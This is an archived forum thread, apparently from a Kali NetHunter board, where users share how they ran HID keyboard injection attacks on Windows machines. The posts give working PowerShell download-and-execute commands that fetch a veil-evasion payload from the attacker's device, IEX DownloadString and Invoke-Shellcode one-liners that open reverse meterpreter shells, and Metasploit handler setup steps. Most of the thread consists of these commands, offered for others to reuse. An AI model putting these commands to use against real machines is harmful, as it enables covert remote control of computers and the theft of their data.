PDA

View Full Version : Hid Keyboard, Payload.



skycrazy
2015-01-01, 20:38
I recently for one reason or another(probably user error) had trouble getting a windows 7 laptop to accept a payload,
having tried various ways and coming up empty handed i ended up creating the payload with veil-evasion and hosting it
in my nexus #/data/local/kali-armhf/var/www folder.

I then used the windows CMD section of HID Keyboard Attack and entered the following, 192.168.0.2 was the ip of my
nexus.

*CD c:/
Powershell
$Url='http://192.168.0.2/payload.bat'
$Path='C:payload.bat'
$Username=''
$Password=''

$WebClient=New-Object System.Net.WebClient
$WebClient.Credentials=New-Object System.Net.Networkcredential($Username, $Password)
$WebClient.DownloadFile( $url, $path )

exit
payload.bat

Then i set up the Listener on my kali laptop, to wait for a call. I selected windows 7 ticked Admin, plugged
in and Pressed Execute. The windows 7 laptop proceeded to download the payload from my nexus and run it.
Kali then recieved a call back straight away. I'm sure this is by far not the best way to do this and could
probably be done a lot easier another way, but for me it suited the situation. And just wanted to share.


Many thanks.

AWV
2015-01-02, 03:41
Would you mind expanding a bit on how to set up the listener?

skycrazy
2015-01-02, 17:16
Sure, i apologise for my terrible writing, i have no excuse :rolleyes:

Well first i opened a console and did :- service postgresql start
Followed by :- msfconsole

Next i used at the msf prompt :- use exploit/multi/handler
:- set PAYLOAD windows/meterpreter/reverse_http

Payload i guess really depends on obviously your payload, Any way , just set your LHOST, LPORT and make sure the relevent ports if needed are forwarded in your router.

Hope this helps, if not give me another shout, again sorry for the terrible writing, its just not my thing.. Cheers

thanhtung
2015-02-16, 08:13
you should post pictures up for everyone to track

jmax
2015-10-16, 23:30
Sure, i apologise for my terrible writing, i have no excuse :rolleyes:

Well first i opened a console and did :- service postgresql start
Followed by :- msfconsole

Next i used at the msf prompt :- use exploit/multi/handler
:- set PAYLOAD windows/meterpreter/reverse_http

Payload i guess really depends on obviously your payload, Any way , just set your LHOST, LPORT and make sure the relevent ports if needed are forwarded in your router.

Hope this helps, if not give me another shout, again sorry for the terrible writing, its just not my thing.. Cheers


I'm having a lot of troubles trying to get HID Keyboard Attack to work, your information was really help full.

What i usually do, is send the powershell to download the file from my nethunter device (The usual payload) and the system connect fine using the Windows CMD attack. I can't get it to work from the Powersploit.

c:\>powershell
PS c:\> IEX (New-Object Net.WebClient).DownloadString("http://192.168.5.15/payload")

For some reason that i can't understand the payload from nethunter is not downloaded from the /var/www/ directory. I found that this file needs to be in the /usr/share/mana-toolkit/www/portal/ directory. If the file is not there the system won't download the file because it can find it.

When I'm using this

PS c:\> IEX (New-Object Net.WebClient).DownloadString("http://192.168.5.15/payload")

some times the meterpreter have problems backgrounding the session, so I end up using


IEX (New-Object Net.WebClient).DownloadString("http://192.168.5.15/payload"); Invoke-Shellcode –Payload windows/meterpreter/reverse_https –Lhost 192.168.1.105 –Lport 4444 –Force

By the way i'm suppose to be using the Nethunter 2.0.1 on lollipop, but the Net Hunter Home reports Version 1.0.

Please excuse my poor English.